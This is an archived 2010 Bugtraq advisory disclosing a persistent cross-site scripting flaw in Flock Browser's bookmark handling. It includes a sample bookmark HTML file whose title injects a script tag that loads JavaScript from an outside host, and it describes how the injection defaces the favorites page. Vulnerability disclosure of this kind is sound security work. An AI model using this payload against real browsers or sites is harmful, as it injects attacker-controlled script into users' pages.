lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 19 Aug 2010 17:01:30 +0200
From: Lostmon lords <lostmon@...il.com>
To: bugtraq@...urityfocus.com
Subject: Flock Browser 3.0.0.3989 Malformed Bookmark XSS and script insertion

#########################################
Flock Browser 3.0.0.3989 Malformed Bookmark XSS
Vendor URL: http://beta.flock.com/
Advisore: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html
Vendor notify:NO exploits availables:YES
#########################################

Flock is faster, simpler, and more friendly. Literally.
It's the only sleek, modern web browser with the built-in
ability to keep you up-to-date with your Facebook and Twitter
friends.This browser version (3.0.0.3989) is based in a old
chromium project


Flock has a flaw that allows Cross-site scripting style attacks
In bookmarks is has a Malformed bookmark title persistent xss
when inport from other browsers a malformed bookmark or when add
a new malformed bookmark or import a bookmark html file.

###############################
Example Of Bookmark html file
###############################

<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
     It will be read and overwritten.
     DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>Menú Marcadores</H1>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605"
LAST_MODIFIED="1282083638">&quot;&gt;&lt;script
src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'&gt;</A>
</DL><p>

#####################EOF##################

 It is a persintent script insercion and when the user click in the
menu for view
favorites page or access directly to favorites url  this make a
"defacement" of this page and them the user can´t access to favorites
:)
( Url of favorites =>
chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )

 ################# €nd #######################

Atentamente:
Lostmon (lostmon@...il.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ